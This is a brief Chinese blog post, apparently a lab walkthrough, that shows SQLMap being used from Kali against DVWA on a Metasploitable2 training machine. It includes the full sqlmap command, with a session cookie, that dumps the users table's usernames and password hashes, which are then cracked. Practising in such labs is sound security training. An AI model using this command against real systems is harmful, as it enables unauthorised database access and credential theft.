使用SQLMap对Metasploitable2实施简单的SQL注入攻击 – 永世隔绝的理想乡

使用SQLMap对Metasploitable2实施简单的SQL注入攻击

2020-12-21 18:59

|

895

|

0

|

|

Shennoter

学习自教程：https://blog.csdn.net/weixin_41843699/article/details/99976743

使用kali访问metasploitable搭建的DVWA

将Security设为low，再到SQL Injection处随机输入一串数字，点击submit后将url保存，按F12查看cookie，将cookie以这种形式保存security=low;PHPSESSID=68a54f9e32f28c4e508575e7b98bae6a

打开sqlmap，输入命令sqlmap -u “http://192.168.0.129/dvwa/vulnerabilities/sqli/?id=123&Submit=Submit#” –cookie=”security=low;PHPSESSID=68a54f9e32f28c4e508575e7b98bae6a” -D dvwa -T users -C user,password –dump

图为跑字典破解密码hash值

可以看到已经运行完毕，成功返回用户名和密码值

-EOF-
这篇文章的作者Shennoter祝你心情愉快ღゝ◡╹)ノ♡♪(^∇^)

暂无评论

发送评论编辑评论

Markdown

悄悄话

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!